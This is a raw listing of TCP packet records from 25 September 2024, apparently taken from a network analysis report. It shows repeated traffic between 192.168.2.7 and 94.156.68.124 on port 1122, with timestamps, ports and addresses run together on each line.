                                  Sep 25, 2024 01:11:12.311074972 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311081886 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311091900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311110020 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311343908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311359882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311374903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311391115 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311409950 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311417103 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311427116 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311464071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311705112 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311722040 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311757088 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.311882019 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311897993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.311943054 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.315509081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315542936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315557957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315634012 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.315676928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315726042 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.315798998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315819979 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315834999 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315850019 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315861940 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.315865993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315882921 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315892935 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.315897942 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315915108 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.315926075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.315952063 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316179991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316194057 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316209078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316231966 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316294909 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316308022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316322088 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316330910 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316337109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316350937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316359043 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316365957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316380978 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316395998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316402912 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316425085 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316426039 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316462994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316489935 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316504955 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316539049 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316844940 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316859961 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316874027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316899061 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316925049 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316941023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316953897 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316962957 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.316968918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.316987991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317084074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317120075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317162991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317178965 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317193031 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317208052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317218065 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317245960 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317325115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317341089 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317356110 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317370892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317378998 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317387104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317405939 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317612886 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317629099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317642927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317656040 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317656994 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317672014 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317682028 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317697048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317713022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317725897 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.317728996 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.317751884 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319025040 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319048882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319062948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319077015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319091082 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319097996 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319097996 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319108963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319123983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319133997 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319145918 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319169998 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319186926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319202900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319216013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319221973 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319231987 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319252014 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319256067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319271088 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319278955 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319293022 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319293022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319312096 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319317102 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319341898 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319427013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319442034 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319458961 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319474936 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319480896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319494963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319509983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319516897 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319525957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319540977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319549084 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319576025 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319602966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319617033 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319629908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319644928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319649935 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319660902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319683075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319716930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319731951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319752932 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319833040 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319849014 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319869995 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.319972992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.319988966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320002079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320009947 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.320018053 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320031881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320044994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.320048094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320063114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320069075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.320077896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320094109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320108891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320110083 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.320123911 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320133924 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.320138931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320157051 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.320163012 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.320188999 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.396508932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396532059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396548986 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396573067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396580935 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.396589994 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396606922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396611929 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.396672010 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.396729946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396748066 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396794081 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.396872997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396888971 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396905899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.396927118 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397099018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397114992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397130966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397138119 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397146940 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397166014 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397249937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397267103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397284985 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397433996 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397471905 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397609949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397625923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397639036 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397661924 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397804022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397819042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397830963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.397871971 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.397937059 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405232906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405247927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405265093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405281067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405297041 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405363083 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405375004 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405391932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405406952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405437946 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405558109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405597925 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405745983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405764103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405780077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405812025 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405901909 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405917883 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405934095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405942917 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.405950069 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405966043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.405987024 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.406008959 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.406215906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406230927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406245947 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406284094 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.406357050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406373024 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406389952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406399012 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.406440973 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.406517029 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406533957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.406584024 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.407288074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407303095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407318115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407346964 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.407444000 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407459974 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407490015 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.407613993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407629967 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407645941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407659054 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.407691956 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.407764912 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407780886 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407797098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407810926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407824993 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.407830000 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.407852888 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408057928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408073902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408090115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408106089 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408127069 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408242941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408257961 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408273935 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408289909 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408305883 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408309937 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408320904 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408579111 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408595085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408611059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408627033 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408628941 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408643961 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408652067 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408660889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408677101 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408683062 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408693075 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408708096 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.408725023 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.408750057 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413146973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413161993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413177013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413193941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413206100 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413239956 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413294077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413309097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413324118 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413337946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413351059 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413378000 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413813114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413827896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413844109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413857937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413867950 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413897038 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.413969994 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.413986921 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414002895 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414021969 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414128065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414143085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414158106 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414165020 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414191961 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414194107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414211035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414247036 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414382935 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414400101 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414416075 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414432049 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414439917 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414444923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414468050 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414541960 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414558887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414573908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414578915 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414589882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414609909 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414679050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414695024 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414716005 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414863110 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414876938 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414891005 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414901018 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414906979 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414922953 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414923906 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414940119 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414956093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414971113 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.414973974 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414990902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.414997101 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.415009975 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.415025949 CEST11224970094.156.68.124192.168.2.7
